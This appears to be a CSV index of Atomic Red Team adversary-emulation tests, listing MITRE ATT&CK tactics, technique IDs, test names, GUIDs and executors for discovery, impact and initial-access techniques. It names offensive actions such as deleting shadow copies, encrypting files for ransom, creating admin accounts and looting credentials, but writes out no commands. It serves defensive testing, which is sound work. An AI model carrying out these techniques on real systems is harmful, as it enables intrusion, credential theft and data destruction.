discovery,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
discovery,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0814d1-bb24-402d-9615-1b20c50733fb,powershell
discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
discovery,T1135,Network Share Discovery,7,PowerView ShareFinder,d07e4cc1-98ae-447e-9d31-36cb430d28c4,powershell
discovery,T1135,Network Share Discovery,8,WinPwn - shareenumeration,987901d1-5b87-4558-a6d9-cffcabc638b8,powershell
discovery,T1135,Network Share Discovery,9,Network Share Discovery via dir command,13daa2cf-195a-43df-a8bd-7dd5ffb607b5,command_prompt
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,12,Show System Integrity Protection status (MacOS),327cc050-9e99-4c8e-99b5-1d15f2fb6b96,sh
discovery,T1082,System Information Discovery,13,WinPwn - winPEAS,eea1d918-825e-47dd-acc2-814d6c58c0e1,powershell
discovery,T1082,System Information Discovery,14,WinPwn - itm4nprivesc,3d256a2f-5e57-4003-8eb6-64d91b1da7ce,powershell
discovery,T1082,System Information Discovery,15,WinPwn - Powersploits privesc checks,345cb8e4-d2de-4011-a580-619cf5a9e2d7,powershell
discovery,T1082,System Information Discovery,16,WinPwn - General privesc checks,5b6f39a2-6ec7-4783-a5fd-2c54a55409ed,powershell
discovery,T1082,System Information Discovery,17,WinPwn - GeneralRecon,7804659b-fdbf-4cf6-b06a-c03e758590e8,powershell
discovery,T1082,System Information Discovery,18,WinPwn - Morerecon,3278b2f6-f733-4875-9ef4-bfed34244f0a,powershell
discovery,T1082,System Information Discovery,19,WinPwn - RBCD-Check,dec6a0d8-bcaf-4c22-9d48-2aee59fb692b,powershell
discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,26a18d3d-f8bc-486b-9a33-d6df5d78a594,powershell
discovery,T1082,System Information Discovery,24,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
discovery,T1082,System Information Discovery,25,System Information Discovery with WMIC,8851b73a-3624-4bf7-8704-aa312411565c,command_prompt
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt,76f71e2f-480e-4bed-b61e-398fe17499d5,command_prompt
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt,4312cdbc-79fc-4a9c-becc-53d49c734bc5,command_prompt
discovery,T1217,Browser Bookmark Discovery,7,List Internet Explorer Bookmarks using the command prompt,727dbcdb-e495-4ab1-a6c4-80c7f77aef85,command_prompt
discovery,T1217,Browser Bookmark Discovery,8,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell
discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt
discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1016,System Network Configuration Discovery,9,DNS Server Discovery Using nslookup,34557863-344a-468f-808b-a1bfb89b4fa9,command_prompt
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs,d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec,command_prompt
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c-5991-4b19-aaf5-7cc2fe298c5d,powershell
discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
discovery,T1482,Domain Trust Discovery,8,TruffleSnout - Listing AD Infrastructure,ea1b4f2d-5b82-4006-b64f-f2845608a3bf,command_prompt
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
discovery,T1057,Process Discovery,6,Discover Specific Process - tasklist,11ba69ee-902e-4a0f-b3b6-418aed7d7ddb,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-07bf197884b2,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,7,Permission Groups Discovery for Containers- Local Groups,007d7aa4-8c4d-4f55-ba6a-7c965d51219c,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
discovery,T1201,Password Policy Discovery,10,Use of SecEdit.exe to export the local security policy (including the password policy),510cc97f-56ac-4cd3-a198-d3218c23d889,command_prompt
discovery,T1201,Password Policy Discovery,11,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,3,Discover System Language with locale,837d609b-845e-4519-90ce-edc3b4b0e138,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,4,Discover System Language with localectl,07ce871a-b3c3-44a3-97fa-a20118fdc7c9,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt
discovery,T1018,Remote System Discovery,4,Remote System Discovery - ping sweep,6db1f57f-d1d5-4223-8a66-55c9c65a9592,command_prompt
discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5-0447-4be4-944a-1f8530ed6574,command_prompt
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-WmiObject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1046,Network Service Discovery,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
discovery,T1046,Network Service Discovery,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
discovery,T1046,Network Service Discovery,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
discovery,T1046,Network Service Discovery,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
discovery,T1124,System Time Discovery,3,System Time Discovery in macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
discovery,T1124,System Time Discovery,5,System Time with Windows time Command,53ead5db-7098-4111-bb3f-563be390e72e,command_prompt
reconnaissance,T1592.001,Gather Victim Host Information: Hardware,1,Enumerate PlugNPlay Camera,d430bf85-b656-40e7-b238-42db01df0183,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
impact,T1531,Account Access Removal,5,Delete User via dscl utility,4d938c43-2fe8-4d70-a5b3-5bf239aa7846,sh
impact,T1531,Account Access Removal,6,Delete User via sysadminctl utility,d3812c4e-30ee-466a-a0aa-07e355b561d6,sh
impact,T1531,Account Access Removal,7,Azure AD - Delete user via Azure AD PowerShell,4f577511-dc1c-4045-bcb8-75d2457f01f4,powershell
impact,T1531,Account Access Removal,8,Azure AD - Delete user via Azure CLI,c955c1c7-3145-4a22-af2d-63eea0d967f0,powershell
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1486,Data Encrypted for Impact,6,Encrypt files using 7z utility - macOS,645f0f5a-ef09-48d8-b9bc-f0e24c642d72,sh
impact,T1486,Data Encrypted for Impact,7,Encrypt files using openssl utility - macOS,1a01f6b8-b1e8-418e-bbe3-78a6f822759e,sh
impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt
impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,bash
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
